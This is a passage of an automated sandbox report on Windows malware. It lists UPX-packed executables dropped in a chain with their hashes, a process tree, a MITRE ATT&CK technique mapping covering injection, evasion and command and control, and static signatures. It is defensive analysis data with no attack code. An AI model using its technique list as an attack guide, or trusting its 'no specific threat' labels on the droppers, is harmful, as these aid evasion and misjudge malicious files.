true}, {"name": "rhjvpvp.exe", "file_path": "C:\\rhjvpvp.exe", "file_size": 49734, "sha256": "17dad44dd411467858b2b702b74289815e836906480a715a3a65e2011b578a93", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nbnxn.exe (PID: 4020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rpbfjr.exe", "file_path": "C:\\rpbfjr.exe", "file_size": 49681, "sha256": "e622ca3d1dd747a8f60c5395224020cbbb5bc40e8a54ee14f9666cb6a2b1227b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rpbfjr.exe (PID: 4236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tdbrbj.exe", "file_path": "C:\\tdbrbj.exe", "file_size": 49840, "sha256": "8a17a64396d27b672ed9f71574ccad3386a91c32091340a28b663a318df40e1c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tdbrbj.exe (PID: 3164)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "thvfh.exe", "file_path": "C:\\thvfh.exe", "file_size": 49950, "sha256": "edcafbe0387407367d3d6ad06ab301518fcf50dac2cb9c201a43a874457395b7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "thvfh.exe (PID: 956)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tlbnpbh.exe", "file_path": "C:\\tlbnpbh.exe", "file_size": 49647, "sha256": "0487d1850849880963dce486c98b121661a3c1412ea9d832c71f968fea4f43b2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tlbnpbh.exe (PID: 3424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tpjrfn.exe", "file_path": "C:\\tpjrfn.exe", "file_size": 49286, "sha256": "95ba4a2ff5785a5c5b74048fcdee72af24f4ed35272570d052a8bd8ea403a97d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tpjrfn.exe (PID: 848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ttldj.exe", "file_path": "C:\\ttldj.exe", "file_size": 49632, "sha256": "8cdc92dd1bd7187ee9f7f3ba7951677c1f4922453e283b219ece9724b49ef059", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ttldj.exe (PID: 3692)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vrjppt.exe", "file_path": "C:\\vrjppt.exe", "file_size": 49875, "sha256": "9b79518d87a543f70b95f4612bac3a9628e0eeec70dc8c2b7a85f6f63de50380", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vrjppt.exe (PID: 1920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vtrppln.exe", "file_path": "C:\\vtrppln.exe", "file_size": 49382, "sha256": "8c76c9453fcceafbeaf57aa8b8741379e508c699240e9500e46e94d910a2aeda", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vtrppln.exe (PID: 4116)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vxbrbpd.exe", "file_path": "C:\\vxbrbpd.exe", "file_size": 49150, "sha256": "5966d3699e8535c819fc408dfd06ce9ef73e36625e2301c27f9152db09ca5334", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vxbrbpd.exe (PID: 5996)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xbbhhv.exe", "file_path": "C:\\xbbhhv.exe", "file_size": 50027, "sha256": "33a65f02c269c1b2fcbe36def57fa0751fd790ba6ec46b901febb778e1cc86a4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xbbhhv.exe (PID: 2572)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rfbrlrh.exe", "file_size": 50495, "sha256": "0e99c8a07078746986d4fc1b93279811080efb088c95bd3825e26065e73c6f71", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "blpjp.exe", "file_size": 50476, "sha256": "121ee8ab2bf739074f5874d9df9b0dbf5f9845b2c42a1fe043acde260ad128c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vllrv.exe", "file_size": 50458, "sha256": "fe73ca79bd3ffe235c567c9c094c3fa93c08531e5ac69f65471a957a764878e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hpjbbfh.exe", "file_size": 50446, "sha256": "861612a0e421d70b92ddc357284853a8803abb5cf0d36e650a86b977d7efbbe5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4000248.exe", "file_size": 50433, "sha256": "21714a8f6b6a9cb0d049dadc3375c934c0edc9c4e82ecdc4a62cbdb9f0a882df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vptfx.exe", "file_size": 50422, "sha256": "be04e64d51227e2c090b343bdef4d1d6692450131f563e1ce75b11bcfbb69f76", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dvlvp.exe", "file_size": 50404, "sha256": "02c2911cc507f9e760c58a0573a3dbf96380baac08cea4fa214ee24dbce3d63b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdljr.exe", "file_size": 50394, "sha256": "d97680cdb95128ff76d53130d6f4e887e753d67465b247f14426c21dc5e48748", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "brvtdb.exe", "file_size": 50375, "sha256": "dbb678fa1debc9854909e8789bd5522f279476939bc81cb84736e83358ef1840", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2846688.exe", "file_size": 50356, "sha256": "17f6ed24c801afcbf9baf6ed673de688836f58d871093472f08c85eb30bfc2f4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "488862.exe", "file_size": 50341, "sha256": "43233b15c9ffe6398f51c3d10f31db33f42a405d5d6be9707d0c98bc193726a0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06448.exe", "file_size": 50326, "sha256": "7f3cc37d134cb4720538896d1decece36898fe282a87aa1294d98d05532c84da", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjrdb.exe", "file_size": 50313, "sha256": "2ff166a3203a5f5a186e294edadbfe0d82fe6a7d726bb37cb3b1d4bd332c51cb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tdplj.exe", "file_size": 50301, "sha256": "2a21999728301b56b5f4e2e0fabd6cec8737c28d3bd858a1172c339a3c67d506", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "02482.exe", "file_size": 50282, "sha256": "8bfcdd3f31d34568bd1a5ecb874d2d2bece30e81a39752b9c52ed8521850b768", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "86844.exe", "file_size": 50265, "sha256": "787bf079ed280eb56cd63d8bc76428c81476685fa949e05c537c493372b4131c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "njnplr.exe", "file_size": 50248, "sha256": "22556630ce7ab34f981267fdbea8e0e4ed6f679c45b932bccfd026d2ab1b3c65", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jbvjrv.exe", "file_size": 50234, "sha256": "e543aa0b31716117e0dc33c6cbc425399427d928c58eb065f78f2344baeb1cd8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "djhxhx.exe", "file_size": 50221, "sha256": "dd5764204222a5bb5bd0f089d1d9376dad5168863d722850d4a0d47171cc315d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rdtdhx.exe", "file_size": 50208, "sha256": "7170455d1f280c11990f7dacf22cfb31c13e949ce05d531c0050a7d4840509d1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jhhhxxb.exe", "file_size": 50191, "sha256": "f97fd352fe4668daaf532e60e678e822bf016c1df15c63c0ff5e71c8577f9a8d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "llfppf.exe", "file_size": 50174, "sha256": "80659efa3d3184f62ab0aaf8c58c2cfd65917b84da187104f42e60860cd0334d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hxfnr.exe", "file_size": 50155, "sha256": "fcfbf7b47db050e319b2dce44cb5f7d35a0bff61b50f42e6b942362f5af4bfe3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xtxdjfh.exe", "file_size": 50137, "sha256": "8f4423bbf22f5546fa46cb195189cbd841d8312f4f570104f94f426e80caa599", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2808244.exe", "file_size": 50120, "sha256": "47147957728e1f45b21fca7ac275c621f310ef3fce662a53a45fa1713055f40a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04424.exe", "file_size": 50105, "sha256": "b14ea9236d2e735290d8f3aa461ce19130bd5c6adb11508b3c57b1f2625cea6d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24442.exe", "file_size": 50088, "sha256": "dd9987221842a4d9f547c99879dbf45e9df090d67b1aa7496eef293e1bdda0c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "802244.exe", "file_size": 50071, "sha256": "b799570f1ee02a2ace939411e4eacfb3ffaedf5610ee9126cbbf78a712d1caac", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005728", "name": "48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe", "normalized_path": "C:\\48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe", "sha256": "48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1"}, {"uid": "00000000-00005860", "parentuid": "00000000-00005728", "name": "026026.exe", "normalized_path": "c:\\026026.exe", "sha256": "27fa97cdbe3414f74ce773f1ff2eb2b5c65160adf3a0435fdb88b9d8a11130f6"}, {"uid": "00000000-00006136", "parentuid": "00000000-00005860", "name": "hfxjvn.exe", "normalized_path": "c:\\hfxjvn.exe", "sha256": "e0b7fcae1e7e52e115171e04df090075d8e243435ded7330d445aa0444ecc103"}, {"uid": "00000000-00005996", "parentuid": "00000000-00006136", "name": "vxbrbpd.exe", "normalized_path": "c:\\vxbrbpd.exe", "sha256": "5966d3699e8535c819fc408dfd06ce9ef73e36625e2301c27f9152db09ca5334"}, {"uid": "00000000-00005956", "parentuid": "00000000-00005996", "name": "lbvtbl.exe", "normalized_path": "c:\\lbvtbl.exe", "sha256": "3e46b069747e996ce9286294844e291f7508d07c47a3f5035c42273dec59cb7a"}, {"uid": "00000000-00004388", "parentuid": "00000000-00005956", "name": "22428.exe", "normalized_path": "c:\\22428.exe", "sha256": "28f207fce2603f5e8b7f722bf768f78672e517dfa600ecfb6130178901448f20"}, {"uid": "00000000-00003512", "parentuid": "00000000-00004388", "name": "66488.exe", "normalized_path": "c:\\66488.exe", "sha256": "4b7705150a79580d8a80db040042a3270651259d6e54c29aa13589fc597599f5"}, {"uid": "00000000-00006068", "parentuid": "00000000-00003512", "name": "4640842.exe", "normalized_path": "c:\\4640842.exe", "sha256": "c4d7e8052fe26c721b192fb9ba5a4f0f999ade20a2c5e25857caf91c1e116771"}, {"uid": "00000000-00002260", "parentuid": "00000000-00006068", "name": "068466.exe", "normalized_path": "c:\\068466.exe", "sha256": "044da255c0a7811b55e26b9d269897455c348eda4de329109096c2dee464fc9d"}, {"uid": "00000000-00006036", "parentuid": "00000000-00002260", "name": "06200.exe", "normalized_path": "c:\\06200.exe", "sha256": "37e6e0780cc1b92ef199fd5cf1d16ad3a737978b5f49b12422a9f57aadf24ab1"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rfbrlrh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"blpjp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vllrv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hpjbbfh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4000248.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vptfx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dvlvp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pdljr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"brvtdb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2846688.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"488862.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"06448.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vjrdb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tdplj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"02482.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"86844.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"njnplr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jbvjrv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"djhxhx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rdtdhx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jhhhxxb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"llfppf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hxfnr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xtxdjfh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword 